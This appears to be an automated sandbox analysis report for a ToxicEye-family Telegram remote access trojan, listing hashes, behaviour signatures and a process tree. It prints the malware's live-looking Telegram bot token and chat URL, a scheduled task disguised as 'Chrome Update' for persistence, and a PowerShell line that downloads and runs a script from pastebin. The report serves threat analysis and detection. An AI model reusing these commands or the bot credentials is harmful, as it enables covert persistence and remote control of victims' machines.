Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
05/01/2025, 12:30
Behavioral task
behavioral1
Sample
TelegramRAT.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
TelegramRAT.exe
-
Size
119KB
-
MD5
47436ad8508cbdbede6535db163766bc
-
SHA1
c6c6f8eb7dac9f294da1547e30c320a7d316bf52
-
SHA256
43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0
-
SHA512
255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c
-
SSDEEP
3072:gAWfRzlXCwwFwOwWAmm+G/bxqH8QW8zCrAZu/tM1:gAD1SWHe/bg/p
Malware Config
Extracted
toxiceye
https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendMessage?chat_id=8130842755
Signatures
-
Toxiceye family
-
Executes dropped EXE 1 IoCs
pid Process 1768 rat.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 984 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1496 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2100 schtasks.exe 2400 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1768 rat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe 1768 rat.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1788 TelegramRAT.exe Token: SeDebugPrivilege 984 tasklist.exe Token: SeDebugPrivilege 1768 rat.exe Token: SeDebugPrivilege 1768 rat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1768 rat.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1788 wrote to memory of 2100 1788 TelegramRAT.exe 79 PID 1788 wrote to memory of 2100 1788 TelegramRAT.exe 79 PID 1788 wrote to memory of 4904 1788 TelegramRAT.exe 81 PID 1788 wrote to memory of 4904 1788 TelegramRAT.exe 81 PID 4904 wrote to memory of 984 4904 cmd.exe 83 PID 4904 wrote to memory of 984 4904 cmd.exe 83 PID 4904 wrote to memory of 2736 4904 cmd.exe 84 PID 4904 wrote to memory of 2736 4904 cmd.exe 84 PID 4904 wrote to memory of 1496 4904 cmd.exe 85 PID 4904 wrote to memory of 1496 4904 cmd.exe 85 PID 4904 wrote to memory of 1768 4904 cmd.exe 86 PID 4904 wrote to memory of 1768 4904 cmd.exe 86 PID 1768 wrote to memory of 2400 1768 rat.exe 88 PID 1768 wrote to memory of 2400 1768 rat.exe 88 PID 1768 wrote to memory of 4840 1768 rat.exe 90 PID 1768 wrote to memory of 4840 1768 rat.exe 90 PID 1768 wrote to memory of 3556 1768 rat.exe 92 PID 1768 wrote to memory of 3556 1768 rat.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1788"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:2736
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:1496
-
-
C:\Users\ToxicEye\rat.exe"rat.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2400
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c <ipconfig>4⤵PID:4840
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c <powershell "irm "pastebin.com/raw/1nfKw4aY" | iex">4⤵PID:3556
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
188B
MD518f5841a0c93cc750a9d06ebeab36a36
SHA1d6ff80e60c0d9fcc1e46d56c157b1dd18c23138a
SHA256ad1654182869b6ff16718dd44d1313ea606af6240014faf82d1f61d03c549f15
SHA512f099364c9cffecde66a0874baf10949dc8a54963204d113acd2e71b98fa5d0b9c48c627e03a22fe22af4675cab7be0e8e27dbd1a6e18e73b5806c52dff2280da
-
Filesize
119KB
MD547436ad8508cbdbede6535db163766bc
SHA1c6c6f8eb7dac9f294da1547e30c320a7d316bf52
SHA25643eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0
SHA512255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c